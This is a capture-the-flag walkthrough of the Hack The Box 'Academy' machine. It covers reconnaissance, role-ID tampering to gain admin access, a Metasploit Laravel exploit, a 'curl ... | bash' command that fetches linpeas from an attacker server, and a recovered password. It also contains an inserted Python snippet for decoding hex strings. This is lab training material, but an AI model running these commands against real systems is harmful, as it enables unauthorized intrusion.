Hack The Box Academy

sudo nmap -sS -sC -sV -O -A 10.129.60.11
Nothing from gobuster
I tried a Nikto scan as well, but nothing came back. After googling around I came across some default wfuzz scanning tips, so I tried the command below and got back some results.
wfuzz -u http://academy.htb/FUZZ.php -w /usr/share/wordlist/wfuzz/general/common.txt --hc 404,403
After trying all the .php extensions I decided to focus on register.php. You can make an account, but afterwards there was not much to go off. The site did seem vulnerable to an LFI because I tried a few LFI attacks, but nothing came back.
I encountered an error when logging back in with the account I made, so I decided to see what the request looked like through Burp Suite.
The username and password are in the clear with a roleid=0.
Note: Not sure what roleid is so I googled it.
Once I created a new user, I logged back in and caught the request. This time the roleid parameter was not present, so I pursued this “roleid” even more.
No luck here
Using login.php with a modified admin roleid=2 still takes you to the user dashboard. No luck.
Using a new modified username “admin4” and pass “123” with roleid=1, combined with using the admin.php extension, I was able to log in. Burp Suite to the rescue!
dev-staging-01.academy.htb looks like some sort of follow-on link. You cannot visit the site by simply placing it in your URL bar. You need to modify your /etc/hosts so that the name resolves.
O snap!
Recon
searchsploit Laravel
I came across this blog post and tried following the steps but every time I ran the exploit it failed.
There is an option to set VHOST, which will need to be set to “dev-staging-01.academy.htb”.
Fired up Metasploit




Recon: Found some users

Unfortunate

After setting up a Python server, I curled linpeas.sh to the box using this command:
curl 10.10.14.113:9797/linpeas.sh | bash
Linpeas didn’t find anything worthy, but I had a suspicion that /var/www/html might hold more info. Linpeas did find a lot of referenced usernames in that directory.

Do not recommend. Might blow the machine up

I changed directories and tried to sudo into cry0lit3 with the password I found in the academy folder. Boom!

Ran linpeas.sh again with this user
Found this highlighted in red

Note: Need to find a good tool to identify number strings
The HEX code seems to be a password: mrb3n_Ac@d3my!
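For the note above about spotting encoded strings, here is an added example (not part of the original write-up) that scans text for runs of hex digits and keeps only those that decode to readable ASCII, which is also how a defender can check logs for secrets that leaked in hex form. The function name, the sample text and the sample secret are all constructed for illustration.

```python
import re
import string

# An even-length run of hex digits, optionally prefixed with 0x, that is not
# part of a longer hex run (odd-length runs cannot be whole bytes and are skipped).
HEX_RUN = re.compile(r"(?<![0-9A-Fa-f])(?:0x)?((?:[0-9A-Fa-f]{2})+)(?![0-9A-Fa-f])")

# Bytes accepted as readable text: printable ASCII minus vertical tab / form feed.
READABLE = set(string.printable.encode("ascii")) - {0x0B, 0x0C}


def decode_hex_strings(text, min_bytes=4):
    """Return (hex_run, decoded_text) for every hex run that decodes to readable ASCII.

    min_bytes drops short accidental matches such as the "ec" inside "checksum".
    Hashes and other binary values fail the readability check and are dropped.
    """
    hits = []
    for match in HEX_RUN.finditer(text):
        raw = bytes.fromhex(match.group(1))
        if len(raw) >= min_bytes and all(b in READABLE for b in raw):
            hits.append((match.group(1), raw.decode("ascii")))
    return hits


# Constructed sample input: one hex-encoded secret, one MD5 digest (of the
# empty string) and one short numeric id. Only the first should be reported.
SAMPLE_SECRET = "Constructed_Pw1!"
SAMPLE_TEXT = "\n".join([
    "field=" + SAMPLE_SECRET.encode("ascii").hex().upper(),
    "checksum d41d8cd98f00b204e9800998ecf8427e",
    "id=0x1f3",
])

if __name__ == "__main__":
    for hex_run, decoded in decode_hex_strings(SAMPLE_TEXT):
        print(f"{hex_run} -> {decoded!r}")
```

Lowering `min_bytes` finds shorter strings at the cost of more false positives from ordinary words and numbers.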



Time to Google more about composer





